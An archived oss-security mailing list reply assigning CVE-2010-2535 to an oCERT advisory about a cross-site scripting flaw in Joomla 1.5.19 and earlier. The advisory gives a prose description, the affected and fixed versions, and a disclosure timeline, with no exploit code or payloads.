[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] [oCERT-2010-002] Joomla input sanitization
From: Josh Bressers <bressers () redhat ! com>
Date: 2010-07-21 17:43:55
Message-ID: 297267266.1124781279734235963.JavaMail.root () zmail01 ! collab ! prod ! int ! phx2 ! redhat ! com
[Download RAW message or body]
Please use CVE-2010-2535 for this.
Thanks.
--
JB
----- "Andrea Barisani" <lcars@ocert.org> wrote:
> #2010-002 Joomla input sanitization errors (XSS)
>
> Description:
>
> Joomla, an open source content management system, suffers from a
> cross-site
> scripting (XSS) vulnerability.
>
> Insufficient input sanitization on the parameters passed to pages
> related to
> administration settings leads to arbitrary javascript injection in the
> context
> of the user session, this could be potentially exploited to hijack the
> session
> of the Joomla administrator.
>
> Affected version:
>
> Joomla <= 1.5.19
>
> Fixed version:
>
> Joomla >= 1.5.20
>
> Credit: vulnerability report and PoC received from Mesut Timur <mesut
> [at]
> mavitunasecurity [dot] com>.
>
> CVE: N/A
>
> Timeline:
>
> 2010-06-01: vulnerability report received
> 2010-06-01: contacted Joomla Security Team
> 2010-07-15: Joomla advisory published
> 2010-07-20: oCERT advisory published
>
> References:
> http://developer.joomla.org/security/news/318-20100704-core-xss-vulnerabilitis-in-back-end.html
>
> Permalink:
> http://www.ocert.org/advisories/ocert-2010-002.html
>
> --
> Andrea Barisani | Founder & Project Coordinator
> oCERT | Open Source Computer Emergency Response Team
>
> <lcars@ocert.org> http://www.ocert.org
> 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E
> "Pluralitas non est ponenda sine necessitate"
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic